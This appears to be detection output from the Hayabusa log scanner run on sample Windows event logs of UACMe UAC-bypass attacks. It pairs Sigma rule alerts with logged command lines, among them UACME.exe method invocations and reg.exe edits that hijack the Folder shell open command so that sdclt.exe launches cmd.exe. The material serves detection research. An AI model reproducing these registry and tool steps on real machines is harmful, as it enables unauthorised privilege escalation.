+2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: consent.exe 896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  37  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu  :  Path: C:\Windows\System32\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu  :  Path: C:\Windows\System32\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  36  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu  :  Path: C:\Windows\System32\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu  :  Path: C:\Windows\System32\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe""   :  Path: C:\Windows\System32\dcomcnfg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe""   :  Path: C:\Windows\System32\dcomcnfg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc  :  Path: C:\Windows\System32\mmc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  38  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""  :  Path: C:\Windows\System32\mmc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe""   :  Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  39  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc  :  Path: C:\Windows\System32\mmc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc  :  Path: C:\Windows\System32\mmc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  41  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  43  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  45 c:\Windows\SysWOW64\notepad.exe  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe""   :  Path: C:\Windows\System32\changepk.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey  :  Path: C:\Windows\System32\SystemSettingsAdminFlows.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  53  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe""   :  Path: C:\Windows\System32\sdclt.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
